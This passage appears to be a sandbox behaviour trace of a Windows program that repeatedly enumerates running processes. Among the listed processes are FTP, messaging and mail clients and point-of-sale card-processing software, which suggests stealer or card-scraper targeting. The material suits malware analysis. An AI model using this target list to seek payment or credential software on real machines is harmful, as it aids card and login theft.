returned 1 [0060.807] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0060.807] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0060.808] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0060.809] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0060.810] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0060.811] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0060.812] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="webdrive.exe")) returned 1 [0060.813] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0060.814] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0060.815] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0060.816] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0060.817] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0060.818] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0060.819] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0060.820] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0060.820] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0060.821] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0060.822] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0060.823] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0060.824] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0060.825] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 
th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0060.825] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0060.826] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0060.827] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0060.828] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0060.829] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="kay.exe")) returned 1 [0060.829] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos_pulse_angry.exe")) returned 1 [0060.830] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="surelycakemechanisms.exe")) returned 1 [0060.831] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="renometric.exe")) returned 1 [0060.831] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.832] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.833] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0060.834] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0060.835] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0060.835] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x620, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x7c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="osk.exe")) returned 1 [0060.836] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0060.837] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0060.837] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0060.838] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 0 [0060.838] CloseHandle (hObject=0x17c) returned 1 [0060.839] Sleep (dwMilliseconds=0x1) [0060.893] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0060.897] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0060.897] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0060.898] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0060.899] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.899] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0060.900] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.900] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0060.901] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0060.902] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0060.902] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0060.903] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.903] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.904] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.904] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.905] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.906] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0060.906] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.907] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.907] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0060.909] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0060.909] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0060.910] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.910] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0060.911] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0060.912] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avi_attach_midnight.exe")) returned 1 [0060.912] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="packs_foundation_penn.exe")) returned 1 [0060.913] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="similar-kenya-hurt.exe")) returned 1 [0060.913] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="running.exe")) returned 1 [0060.914] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ordinance jelsoft dies.exe")) returned 1 [0060.915] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="introducing_attraction_ranks.exe")) returned 1 [0060.915] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="include-assuming-employers.exe")) returned 1 [0060.916] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operateleetechnologies.exe")) returned 1 [0060.916] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mongolia.exe")) returned 1 [0060.917] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="futurevalleyturned.exe")) returned 1 [0060.917] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="besides-tba-comfortable.exe")) returned 1 [0060.918] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extreme-quiz-standard.exe")) returned 1 [0060.919] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: 
lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sat_ipod.exe")) returned 1 [0060.919] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="well-buttons.exe")) returned 1 [0060.920] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="qty.exe")) returned 1 [0060.920] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="interesting-extends.exe")) returned 1 [0060.921] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fence.exe")) returned 1 [0060.921] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="descending.exe")) returned 1 [0060.922] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="blank.exe")) returned 1 [0060.923] Process32Next (in: hSnapshot=0x17c, 
